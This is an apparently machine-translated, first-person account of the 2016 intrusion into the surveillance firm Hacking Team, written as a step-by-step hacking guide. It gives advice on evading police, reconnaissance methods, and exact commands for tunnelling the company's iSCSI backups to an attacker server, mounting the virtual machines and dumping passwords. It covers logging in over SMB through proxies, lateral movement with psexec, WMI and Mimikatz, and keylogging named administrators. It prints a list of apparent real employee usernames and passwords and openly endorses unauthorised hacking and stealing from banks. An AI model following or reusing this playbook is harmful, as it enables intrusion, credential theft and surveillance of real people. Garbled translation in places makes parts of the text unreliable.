Range, 2016/04/20 17:08

0x00 Hacking Team

Hacking Team is a company that helps governments hack and spy on journalists, politicians, and sometimes terrorists and criminals. Its CEO, Vincenzetti, likes to end his emails with the Nazi slogan “Boia Chi Molla” (death to quitters), and he has long claimed to have the technology to solve both the “Tor problem” and the “dark web problem”. But I’ve always doubted the effectiveness of his technique.

0 x01 be careful

Unfortunately, our world is upside down. The more you do bad things, the richer you get. The more you do good things, the more you get caught. But luckily, thanks to the efforts of people like the Tor Project, you can protect yourself from getting caught out with these tips:

1) Encrypt your hard drive

If one day you get caught doing something and the police take away your computer, even though being caught means you’ve made a lot of mistakes, it’s much better to encrypt your hard drive than not.

2) Use virtual machines and run all networks on Tor

This accomplishes two things: first, all your traffic is anonymous. Second, separate your personal life from your anonymous operation to prevent the two from mixing.

3) Do not connect directly to the Tor network (optional)

Tor isn’t a panacea, and it’s possible that when you connect to a Tor network, you happen to be doing something bad. Or maybe you’re doing something bad when you quit the Tor network. It’s better to use someone else’s wifi, or connect to a VPN or relay, and then connect to the Tor Anonymous network.

0x02 Collecting Information

While this process is boring, it is very important, and the bigger the target, the more bugs are likely to occur.

1. Technical information

The following information is mainly used

1)Google

If you use the right words, you can find plenty of serendipity.

2) Secondary domain name collection

Generally speaking, most domain names are provided by third-party companies, and you need to find the IP range of the domain name. Of course, sometimes there are DNS domain delivery vulnerabilities, which make it easier to gather information.

3)Whois query and reverse query

You can also get lots of other subdomains by doing a reverse lookup of various Whois queries and their IP range domain names, and as far as I know, there is no free reverse lookup unless Google hack.

4) Port scanning and fingerprint extraction

Unlike other technologies, you can chat with employees in your company. I put it here as an option because it’s not an attack, it’s just a way to gather information. The service’s intrusion detection system may alert you during the scan, but don’t worry, the whole Inernet scans itself regularly.

Nmap is perfect for scanning, but it can also fingerprint various services. But for large-scale networks, ZMap and Masscan are faster. WhatWeb and BlindElephant are good for grabbing web fingerprints.

2 Social worker information

For social engineering, it is important to collect information about employees, including their roles, contracts, operating systems, browsers, plug-ins, software, etc. Generally, the following methods are used:

1)Google

It’s also the most useful tool.

2)theHarvester y recon-ng

I mentioned these things in the last post, but there’s more to them than that. You can find a lot of information automatically and quickly, and it’s worth your time to read official documents.

3)LinkedIn

You can get a lot of information about employees through this software, and insiders are always inclined to communicate with others.

4)Data.com

It’s like a jigsaw puzzle that puts all kinds of information together.

5)File metadata

You can find a lot of useful information in the various documents published by their company.

0x03 Accessing the Intranet

There are many ways to access the Intranet. The way I accessed the HT Intranet was unusual and took a lot more effort than usual, so I’ll mention two common ways to access the Intranet, which I recommend.

A social worker

Social engineering, especially spear phishing, is one of the more reliable types of infiltration techniques. For more tips, go to the end of the section link. I don’t want to try phishing attacks on HT’s because they are so common to them that they will be very wary. It makes it harder and easier to find out what I’m up to. http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf

2 Purchase Permission

Many companies already have hacked computers, thanks to hard-working Russians and their infiltration tools “Traffic sellers” and “bot Herders”. Almost all fortune 500 large networks have some kind of compromised machine. But Hacking Team is a small company, and most of their employees are information security experts, so it’s highly unlikely that they have a compromised machine in-house.

3 Technical Intrusion

After the Gamma hack, I have described a process for finding vulnerabilities:

http://pastebin.com/raw.php?i=cRYvK4jb
Copy the code

Hacking Team has a segment of public IP:

Inetnum: 93.62.139.32-93.62.139.47 DESCR: HT public subnetCopy the code

Their network is slightly exposed to the extranet, for example, unlike Gamma, which requires a certificate to connect to its public address. HT’s public network server mainly has a Joomla blog (joomScan doesn’t show anything useful), a mail server, several routes, two VPNS, and a spam filtering system. So the only way I can get access now is to find a Joomla 0day, or postfix 0day, or one of their other systems 0day. Embedded system 0day is more reliable to me, so I spent two weeks reverse discovering a command to execute 0day. The 0day hasn’t been fixed yet, so I can’t give any more details.

0x04 Prior preparation

Before the actual attack, I did a lot of testing and preparation, wrote a backdoor into the hardware, and compiled various tools on the embedded system:

1) busybox

This tool is not available on most Unix machines.

2)nmap

Scanning tools

3)Responder.py

Intranet man-in-the-middle attack artifact

4)python

This has to be there

5)tcpdump

caught

6)dsniff

I prefer to use HT etterCap for sniffing various passwords on the Intranet, but it’s cumbersome to compile.

7)socat

The upgraded version of NC, mainly port forwarding

8)screen

Allows you to execute commands in multiple Windows, which is not necessary

9) Socks5 proxy host

Insert proxychains into the Intranet

10)tgcd

The firewall is penetrated through forwarding ports

The worst thing you can do is when you put back doors and tools in, the system crashes, and then ops goes up and it’s all over. So I spent a week testing my various backdoors and EXP before the final deployment.

0x05 Look around

Now that I’m inside the Intranet, I’d like to have a look around and decide what to do next. Put responder. py into analysis mode (-a) and use Nmap to slowly scan first.

0x06 Non-relational database

NoSQL, this authentication-free database is a godsend for me. Just when I was worried about not being able to continue through MySQL, these unauthenticated databases appeared. Nmap found some databases on the HT Intranet:

27017 / TCP open mongo mongo 2.6.5 | mongo - databases: | | ok = 1 totalSizeMb = 47547 | totalSize = 49856643072... | _ version = 27017 / TCP open 2.6.5 mongo mongo 2.6.5 | mongo - databases: | ok = 1 | totalSizeMb = 31987 | totalSize = 33540800512 | databases ... | _ version = 2.6.5Copy the code

These are examples of doing RCS tests. The audio captured by RCS is stored in MongoDB. That’s where the audio from the 400G seed came from, and they’re watching themselves, too.

0 x07 across a network segment

It was interesting to watch HT developing malware on the monitor, although that didn’t help me infiltrate. Their insecure backup systems are the next open door. According to their own documentation, their iSCSI system should be in a separate network segment, but was scanned by NMAP at 192.168.1.200/24:

. 3260/tcp open iscsi? | iscsi - info: | Target: iqn.2000-01.com.synology:ht-synology.name | Address: 192.168.200.66:3260, 0 | _ Authentication: No authentication required Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)... 3260/tcp open iscsi? | iscsi - info: | Target: iqn.2000-01.com.synology:synology-backup.name | Address: 10.0.1.72:3260, 0 | Address: 192.168.200.72:3260, 0 | _ Authentication: No Authentication requiredCopy the code

ISCS required a core module that was difficult to compile in my embedded system. So I’m going to forward the port so it can be mounted on the VPS.

VPS: tgcd-L-p 3260-q 42838 Sistema embebida: tgcd-c-s 192.168.200.72:3260 -c VPS_IP:42838 VPS: Iscsiadm -m discovery -t sendtargets -p 127.0.0.1Copy the code

ISCSI found iqn.2000-01.com.synology, but there were some problems when mounting it, its address is both 192.168.200.72 and 127.0.0.1.

The solution:

Iptables -t NAT -a OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1Copy the code

And then:

Iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --loginCopy the code

Here comes the file system! To mount:

vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
Copy the code

Then you can find secure backups of several virtual machines, and the mail server looks attractive. Even though it’s so big, it can be remotely mounted and searched for what we want:

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

entonces el offset es 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/
Copy the code

Now, in the/MNT/exchange/WindowsImageBackup/exchange/Backup the 2014-10-14 172311 we can find the virtual machine hard disk, and then you can mount up:

vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
Copy the code

Finally, we can see everything on the old mail exchange server in/MNT /part1.

0x08 From Secure Backup to Domain Administrator

In fact, I am most interested in the secure backup file to find some common password or hash to access the physical machine. I used pwdump, cachedump, and lsadump to find possible passwords, and lsdadump found a password for the bes admin server account:

_SC_BlackBerry MDS Connection Service 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 B.E.S. 00! .! .! .Copy the code

I use Proxychains to add socks proxy on embedded machine, and SMB client to try this password:

Proxychains smbclient '/ / 192.168.100.51 / c $' -u' hackingteam. Local/besadmin % bes32678!!! 'Copy the code

Success! The password is still valid and is the local administrator. I use the proxy and Metasploit’s psexec__psh to get a Meterpreter session. I got his other passwords on the machine, including the domain administrator’s.

HACKINGTEAM BESAdmin bes32678!!! HACKINGTEAM Administrator uu8dd8ndd12! HACKINGTEAM c.pozzi P4ssword <---- look! the sysadmin! HACKINGTEAM m.romeo ioLK/(90 HACKINGTEAM l.guerra 4luc@=.= HACKINGTEAM d.martinez W4tudul3sp HACKINGTEAM g.russo GCBr0s0705! HACKINGTEAM a.scarafile Cd4432996111 HACKINGTEAM r.viscardi Ht2015! HACKINGTEAM a.mino A! e? andra HACKINGTEAM m.bettini Ettore&Bella0314 HACKINGTEAM m.luppi Blackou7 HACKINGTEAM s.gallucci 1S9i8m4o! HACKINGTEAM d.milan set! dob66 HACKINGTEAM w.furlan Blu3.B3rry! HACKINGTEAM d.romualdi Rd13136f@# HACKINGTEAM l.invernizzi L0r3nz0123! HACKINGTEAM e.ciceri 2O2571&2E HACKINGTEAM e.rabe[email protected]!
Copy the code

0x09 Downloading Mail

Now THAT I have the domain administrator password, I can access the core of my business, the mail. Every step you take after that is likely to be taken with you. Just in case, download the email first. Powershell helps a lot here. I found a bug in handling dates. Once I got the email, it took me another two weeks to get the source code and stuff, and then I downloaded the new email. The server is Italian, the time format is: day/month/year, I use:

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
Copy the code

This syntax searches the mail server and downloads new messages. The problem is that you get “date error: day cannot be greater than 12”, because the month usually comes first in European time and cannot be greater than 12. It appears that Microsoft engineers only tested their software in their own time zone.

0x0a Download file

Now that I’m a domain manager, I’m starting to download various resources through SMB clients and proxies:

Proxychains smbclient '/ / 192.168.1.230 / detailed FAE DiskStation \ -u' HACKINGTEAM/Administrator % uu8dd8ndd12! ' -Tc FAE_DiskStation.tar '*'Copy the code

At this point, everything has been downloaded.

0x0B Overview of Windows Domain Penetration

Before I wrap up my story with HT, I want to give you a quick overview of Windows Intranet penetration.

1. Horizontal movement (there seems to be no corresponding term for this noun in China)

Here, I’ll give you a review of the various techniques for Intranet penetration. Remote execution requires a password or hash from the local administrator. By far the most common approach is to grab the administrator password locally with Mimikatz on the machine with administrator privileges. The better tools to promote permissions are PowerUp and BYPassuac. Remote mobile:

1)psexec

A great tool for this on Windows. You can use psexec, Winexe, Metasploit’s psexec_psh, Powershell’s Invoke_psexec or Windows built-in function “sc”. For Metasploit modules and Powershell and pTH-winexe, all you need is hash, no password required. This is the most generic approach, but it’s also the least covert. Time type 7045 Service Control Manage is displayed in the time log. In my experience, no one will notice this detail during infiltration, but it can be helpful to investigators.

2)WMI

This is the most subtle way. The WMI service is turned on on all Windows machines except the server, and the firewall on the server does not allow the service through by default. You can use wmiexec.py, pth-wmis, Powershell invoke_wmi, or the built-in Wmic function on Windows. All WMICS need is hash.

3)PSRemoting

This feature is turned off by default, and I don’t recommend turning it on. But if your system administrator has it turned on, it’s handy, especially if you can do everything with Photoshop easily and without leaving too much footprint.

4)GPO

If all of the above methods are firewall filtered and you are domain management, you can use GPO to give the user a login script, install an MSI, perform a scheduled task or, as we saw with Mauro Romeo, use GPO to turn on the WMI service and turn off firewall filtering for that service.

Local Mobile:

1) steal token

If you have administrative rights on one computer, you can use other users’ tokens to access domain resources. There are two main tools for this: incognito and Mimikatz Token ::* Command line.

2)MS14-068

You can exploit a bug in Kerberos to get domain-managed tickets.

3) Process injection

Any remote controller has the function of process injection. Examples include the Migrate command in Meterpreter, pupy, or the psinject command in pwershell. You can inject it into a process that has the tokens you need.

4)runas

This is a very useful tool because it does not require administrator privileges. It uses Windows commands that you can use powershell if you don’t have a GUI.

2 Maintenance Rights

Once you have permissions, the first thing you want to do is keep them. Retention of authority is generally only a challenge for jerks like HT who target individuals and political activists. Permission retention is generally not important for penetrating a company, because the company generally does not turn off the machine. You can learn more about permission maintenance tips from the links below. This is unnecessary for infiltrating a company and increases the chances of discovery. http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ http://www.hexacorn.com/blog/category/autostart-persistence/ https://blog.netspi.com/tag/persistence/

3 Internal investigation

The best tool to explore Windows networks was PowerView. It’s worth checking out the link below:

http://www.harmj0y.net/blog/tag/powerview/ http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ http://www.harmj0y.net/blog/redteaming/powerview-2-0/ http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ http://www.slideshare.net/harmj0y/i-have-the-powerview

Of course, Powershell is also an effective tool, but it was not available on the 2003 and 2000 machines. You can also use the “net view” command as before. Other techniques I like are:

1) List of downloaded files

From a domain administrator account you can use PowerView to download a list of all the files in the network:

Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
Copy the code

Then you can download as many files as you want.

2) Read your email

We already know that you can download emails with PowerShell, and it has a lot of useful information.

3) Check portal sites

This is where many businesses store important information. This can also be downloaded with Powershell.

5) Monitor employees

One of my interests is finding system administrators. Monitoring Christian Pozzi (an administrator at HT) gave me access to the Nagios server as well as access to “Rete Sviluppo”. With a combination of Get-keyStrokes and get-timedscreenshots and GPO from PowerSploit, you can watch any employee, or even an entire domain.

0x0C Search for system Administrator

Through reading their internal documentation, I found that I lacked a very important permission – “Rete Sviluppo” – an isolated network to store the RCS source code. The system administrator always had all the permissions, so I searched Mauro Romeo’s and Christian Pozzi’s computers to see how they managed the Sviluppo network, and to see if there were any other systems I was interested in. Their computers are also domain members, so it’s easy to get access to their computers. Mauro Romeo’s computer didn’t have any ports open, so I opened the WMI port and performed meterpreter. To monitor their keyboards and screens, I use a lot of Metersploit’s/Gathre/modules. Then search around for files of interest. I found out Pozzi had an encrypted volume, and when he mounted it, I copied all the files. Their passwords were of no use to me, and I felt ridiculous. Because mimikatz and the keylogger gave everything away.

0 x0d bridge

Pozzi’s encrypted volume contains a lot of text passwords. Some of these are passwords to the Nagios server, which has access to the Sviluppo network for monitoring purposes. I would have found a bridge into the isolated network. Even though I have the password to the server, he has a public command to execute.

0x0e Reuses and resets the password

After reading the email, I saw that Daniele Milan has access to a Git machine. I already have his Windows password (Mimikatz), I tried it on a Git machine and it worked! And sudo. To get my hands on the GitLab server and their Twitter account, I used the email server and the “Forget password” feature to reset my password.

0 x0f to summarize

That’s how I stood up to a corporation and ended its human rights abuses. This is part of the charm and asymmetry of Hacking: in 100 hours a man can fight and reverse the fortunes of a multi-million dollar company that has been around for several years. Hacking gives losers the chance to fight and win back.

Hacking references usually mean giving up: it’s just a little lesson to be an ethical hacker, don’t hack other people’s systems without permission and so on. I often say this, but often do the opposite. Leaking documents, seizing money from banks and trying to make ordinary people’s computers more secure are ethical hackers. But a lot of people who call themselves “conscience hackers” actually work for the people who pay them more, and who deserve to be hacked more.

HT sees itself as part of Italian innovation, but to me, Vincenzetti and his company, his cronies in the police, the government are all in the Italian fascist tradition. To the victims of the raid on the Diaz Armando school, and to all those who have suffered as a result of Italian fascism.

The original: https://ghostbin.com/paste/6kho7?luicode=10000359, translated by security toolkit.